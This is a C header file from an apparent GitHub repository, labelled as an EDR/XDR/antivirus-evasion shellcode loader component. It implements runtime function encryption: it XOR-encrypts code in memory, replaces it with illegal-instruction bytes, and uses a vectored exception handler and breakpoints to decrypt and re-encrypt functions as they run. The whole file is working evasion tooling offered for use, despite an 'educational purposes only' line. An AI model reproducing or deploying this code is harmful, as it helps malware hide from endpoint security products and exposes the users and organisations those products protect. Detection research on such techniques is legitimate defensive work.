-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathSED.h
187 lines (170 loc) · 6.46 KB
/
SED.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
// --------------------------------------------------
// │ Author : Evilbytecode │
// │ Name : Evilbytecode-EDR/XDR/AV-SHC-LOADER│
// │ Contact : https://github.com/Evilbytecode │
// --------------------------------------------------
// This program is distributed for educational purposes only.
// Credits to : https://github.com/C5Hackr/Segment-Encryption
#include <Windows.h>
#define USE_XOR_ENCRYPTION TRUE
#if USE_XOR_ENCRYPTION
unsigned char xor_key[] = "YwAYwAonvsgHUbnoYwAonvsgHUbnnvsgHUbn";
size_t xor_key_size = NULL;
#endif
typedef struct {
uintptr_t FunctionAddress;
uintptr_t ReturnAddress;
__int64 functionSize;
char* originalInstructions;
BOOL IsJMPReturn;
} EncryptedFunctionList;
EncryptedFunctionList* EncryptedFunctions = NULL;
size_t num_EncryptedFunctions = 0;
BOOL EncryptHandlerInitialized = FALSE;
#define CALL_FUNCTION_SAFE(ptr, args) ((void*(*)(va_list))(ptr))(args)
#pragma optimize("", off)
__declspec(dllexport) void* EndSED(void* returnValue)
{
return returnValue;
}
#pragma optimize("", on)
#if USE_XOR_ENCRYPTION
void xor_encrypt(unsigned char* data, size_t data_len, unsigned char* key, size_t key_len)
{
for (size_t i = 0; i < data_len; i++)
{
data[i] ^= key[i % key_len];
}
}
void xor_decrypt(unsigned char* data, size_t data_len, unsigned char* key, size_t key_len)
{
for (size_t i = 0; i < data_len; i++)
{
data[i] ^= key[i % key_len];
}
}
#endif
__declspec(noinline) void EncryptCodeSection(LPVOID address, char* originalInstructions, int SIZE_OF_FUNCTION)
{
memcpy(originalInstructions, address, SIZE_OF_FUNCTION);
#if USE_XOR_ENCRYPTION
xor_encrypt((unsigned char*)originalInstructions, SIZE_OF_FUNCTION, xor_key, xor_key_size);
#endif
DWORD oldProtect;
VirtualProtect(address, SIZE_OF_FUNCTION, PAGE_EXECUTE_READWRITE, &oldProtect);
for (int i = 0; i < SIZE_OF_FUNCTION; i++)
{
#if _WIN64
* ((char*)((uintptr_t)address + i)) = 0x1F;
#else
* ((char*)((uintptr_t)address + i)) = 0xFE;
#endif
}
VirtualProtect(address, SIZE_OF_FUNCTION, oldProtect, &oldProtect);
}
__declspec(noinline) BOOL SetBreakpoint(LPVOID address)
{
DWORD oldProtect;
VirtualProtect(address, sizeof(char), PAGE_EXECUTE_READWRITE, &oldProtect);
*((char*)address) = 0xCC;
VirtualProtect(address, sizeof(char), oldProtect, &oldProtect);
return TRUE;
}
__declspec(noinline) LONG WINAPI VEHDecryptionHandler(PEXCEPTION_POINTERS exceptions)
{
if (exceptions->ExceptionRecord->ExceptionCode == EXCEPTION_ILLEGAL_INSTRUCTION)
{
for (size_t i = 0; i < num_EncryptedFunctions; i++)
{
if ((uintptr_t)((uintptr_t)exceptions->ExceptionRecord->ExceptionAddress) == (uintptr_t)EncryptedFunctions[i].FunctionAddress)
{
DWORD oldProtect;
VirtualProtect((LPVOID)EncryptedFunctions[i].FunctionAddress, EncryptedFunctions[i].functionSize, PAGE_EXECUTE_READWRITE, &oldProtect);
#if USE_XOR_ENCRYPTION
xor_decrypt((unsigned char*)EncryptedFunctions[i].originalInstructions, EncryptedFunctions[i].functionSize, xor_key, xor_key_size);
#endif
memcpy((LPVOID)EncryptedFunctions[i].FunctionAddress, EncryptedFunctions[i].originalInstructions, EncryptedFunctions[i].functionSize);
VirtualProtect((LPVOID)EncryptedFunctions[i].FunctionAddress, EncryptedFunctions[i].functionSize, oldProtect, &oldProtect);
SetBreakpoint((LPVOID)EncryptedFunctions[i].ReturnAddress);
return EXCEPTION_CONTINUE_EXECUTION;
}
}
return EXCEPTION_CONTINUE_SEARCH;
}
else if (exceptions->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT)
{
for (size_t i = 0; i < num_EncryptedFunctions; i++)
{
if ((uintptr_t)((uintptr_t)exceptions->ExceptionRecord->ExceptionAddress) == (uintptr_t)EncryptedFunctions[i].ReturnAddress)
{
DWORD oldProtect;
VirtualProtect(exceptions->ExceptionRecord->ExceptionAddress, EncryptedFunctions[i].functionSize, PAGE_EXECUTE_READWRITE, &oldProtect);
if (EncryptedFunctions[i].IsJMPReturn)
{
*((char*)exceptions->ExceptionRecord->ExceptionAddress) = 0xE9;
}
else
{
*((char*)exceptions->ExceptionRecord->ExceptionAddress) = 0xE8;
}
VirtualProtect(exceptions->ExceptionRecord->ExceptionAddress, EncryptedFunctions[i].functionSize, oldProtect, &oldProtect);
EncryptCodeSection((LPVOID)EncryptedFunctions[i].FunctionAddress, EncryptedFunctions[i].originalInstructions, EncryptedFunctions[i].functionSize);
return EXCEPTION_CONTINUE_EXECUTION;
}
}
return EXCEPTION_CONTINUE_SEARCH;
}
else
{
return EXCEPTION_CONTINUE_SEARCH;
}
}
CRITICAL_SECTION cs;
__declspec(noinline) void EncryptFunction(uintptr_t functionPointer)
{
if (!EncryptHandlerInitialized)
{
InitializeCriticalSection(&cs);
xor_key_size = strlen((char*)xor_key);
EncryptHandlerInitialized = TRUE;
AddVectoredExceptionHandler(1, &VEHDecryptionHandler);
}
num_EncryptedFunctions++;
EncryptedFunctions = (EncryptedFunctionList*)realloc(EncryptedFunctions, num_EncryptedFunctions * sizeof(EncryptedFunctionList));
EncryptedFunctionList* currentHookInfo = &EncryptedFunctions[num_EncryptedFunctions - 1];
int SIZE_OF_FUNCTION = 0;
unsigned char* current_address = (unsigned char*)((void*)functionPointer);
while (TRUE)
{
BYTE* ptr = (BYTE*)current_address;
if (ptr[0] == 0xE9 && *((DWORD*)(current_address + 1)) == ((DWORD)EndSED - ((DWORD)current_address + 5)))
{
currentHookInfo->IsJMPReturn = TRUE;
currentHookInfo->ReturnAddress = (uintptr_t)current_address;
break;
}
else if (ptr[0] == 0xE8 && *((DWORD*)(current_address + 1)) == ((DWORD)EndSED - ((DWORD)current_address + 5)))
{
currentHookInfo->IsJMPReturn = FALSE;
currentHookInfo->ReturnAddress = (uintptr_t)current_address;
break;
}
current_address++;
SIZE_OF_FUNCTION++;
}
currentHookInfo->FunctionAddress = functionPointer;
currentHookInfo->functionSize = SIZE_OF_FUNCTION;
currentHookInfo->originalInstructions = (char*)malloc(SIZE_OF_FUNCTION * sizeof(char));
memcpy(currentHookInfo->originalInstructions, (void*)functionPointer, SIZE_OF_FUNCTION);
EncryptCodeSection((LPVOID)functionPointer, currentHookInfo->originalInstructions, SIZE_OF_FUNCTION);
}
__declspec(noinline) void* CallFunction(void* ptr, ...)
{
EnterCriticalSection(&cs);
va_list args;
va_start(args, ptr);
void* returnValue = CALL_FUNCTION_SAFE(ptr, args);
va_end(args);
LeaveCriticalSection(&cs);
return returnValue;
}